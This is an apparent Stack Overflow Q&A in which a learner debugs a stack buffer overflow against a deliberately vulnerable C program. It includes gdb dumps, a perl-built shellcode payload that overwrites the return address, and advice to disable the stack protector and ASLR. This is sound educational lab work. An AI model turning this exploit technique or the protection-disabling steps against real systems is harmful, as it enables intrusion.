# How do i bypass a return adress overwrite not redirecting control flow?

Tags: c, gcc, assembly, stack-overflow, buffer-overflow

Let me illustrate the problem here

This is main

```
(gdb) disass main

Dump of assembler code for function main:
   0x000000000040057c <+0>: push   rbp
   0x000000000040057d <+1>: mov    rbp,rsp
   0x0000000000400580 <+4>: sub    rsp,0x40
   0x0000000000400584 <+8>: mov    DWORD PTR [rbp-0x34],edi
   0x0000000000400587 <+11>:    mov    QWORD PTR [rbp-0x40],rsi
   0x000000000040058b <+15>:    mov    rax,QWORD PTR [rbp-0x40]
   0x000000000040058f <+19>:    add    rax,0x8
   0x0000000000400593 <+23>:    mov    rdx,QWORD PTR [rax]
   0x0000000000400596 <+26>:    lea    rax,[rbp-0x30]
   0x000000000040059a <+30>:    mov    rsi,rdx
   0x000000000040059d <+33>:    mov    rdi,rax
   0x00000000004005a0 <+36>:    call   0x400430 <strcpy@plt>
   0x00000000004005a5 <+41>:    mov    eax,0x0
   0x00000000004005aa <+46>:    call   0x400566 <function>
   0x00000000004005af <+51>:    mov    eax,0x0
   0x00000000004005b4 <+56>:    leave  
   0x00000000004005b5 <+57>:    ret    
End of assembler dump.

(gdb) list

#include <stdio.h>
#include <string.h>
void function(){
printf("test");
}
int main(int argc, char* argv[]) {
char a[34];
strcpy(a , argv[1]);
function();
return 0;
}
```

It was compiled using the following:

```
 gcc -g -o exploitable0 vulnerable_program0.c -fno-stack-protector -z execstack
```

The attacker is obviously tempted to overrun the buffer specified by the array 'a'.

Let's examine more in depth what the stack looks like when i run the exploit

```
(gdb) run $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Starting program: /home/twister17/Documents/hacking/exploitable0 $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')

Breakpoint 1, main (argc=2, argv=0x7fffffffdcf8) at vulnerable_program0.c:9
9   function();
(gdb) i r rbp
rbp            0x7fffffffdc10   0x7fffffffdc10
(gdb) i r rsp
rsp            0x7fffffffdbd0   0x7fffffffdbd0
(gdb) x/18xw $rsp
0x7fffffffdbd0: 0xffffdcf8  0x00007fff  0x0040060d  0x00000002
0x7fffffffdbe0: 0x315915eb  0x3104b0c0  0x31c3ffdb  0xcd0fb2d2
0x7fffffffdbf0: 0xff01b080  0xe880cdcb  0xffffffe6  0x6c6c6548
0x7fffffffdc00: 0x771f2c6f  0x646c726f  0x21212121  0x21212121
0x7fffffffdc10: 0x00400566  0x00000000
(gdb)
```

the affected buffer starts at **0x7fffffffdbe0** and ends at **0x7fffffffdc10**.

The shellcode injects smoothtly , to make things simpler i overwrite the return address with that of the function.
That is, I actually used 0x400566 as the return address, so if everything runs smoothly it would just call the function and print "test". You can clearly see from the assembly dump that is the address of the function "function"

expected output: "testtest".

actual output: test ( the program calls the function already).

Comment: What makes you think the compiler-generated code is detecting (and silently fixing!?!) a buffer overflow?  Note that `strcpy` stops at the first `\0`, so it only copies one of the `\x00\x00\x00\x00\x00` bytes at the end of your payload.  Fortunately for you, you still ended up with `0` in the dword above `0x00400566`, i.e. you have `0x00400566` as a qword on the stack, but did you check that that's the right location for the return address?  The most likely thing is that you didn't overwrite the return address at all, because the program ran as written.  **Set a breakpoint and use `stepi`**

Comment: I renamed the title after realizing the actual issue at hand , im still very new to this material, which i managed to fix after even messing around with a 32 bit binary

Comment: If you'd set a breakpoint on the `ret` instruction, you could have seen easily where `$rsp` was pointing.  (And BTW, because of `\0` stopping `strcpy` and other string-based overflows, this only works because the existing return address had the same high 32 bits as the address you needed, with zeros in the right place.  ret2code attacks like this where you return to library code (like `system()` in libc) with useful args are harder in x86-64 because of zeros in registers.  Related: ret2reg https://security.stackexchange.com/questions/157478 where the target sequence is a `jmp reg`)

Answer (score 2):

I think you're having troubles with the **StackGuard** protection from GCC that prevents buffer overflows.

Try compiling your code with the

```
-fno-stack-protector
```

flag in order to disable the protection for your program.

Assuming you're running it on Linux, if you want to disable kernel based protection, which is called **Address Space Randomization**, you can run :

```
sysctl -w kernel.randomize_va_space=0
```

Comment: The binary has no canary, it is shown in the assembly dump.
disabling address space randomization has no noticeable effect.

Comment: Address Space Randomization is not a canary, it's a process that randomly places data zones in the virtual memory. It's a trick that hardens the process of performing buffer overflows/heap overflows because it doesn't place the heap, stack and libraries contiguously for a given process.

Comment: @GabrielReyes: GDB already disables ASLR for processes that you start inside GDB.  And you're right, `-fstack-protector` was already disabled, or at least didn't protect this function, so neither of these suggestions will make a difference, assuming you're running the test inside GDB.  (Which you should be so you can single-step it!)

Comment: I managed to solve this by changing the address adjacent to the one that was overwritten, as i was only overwritting rbp and the return address was unchanged.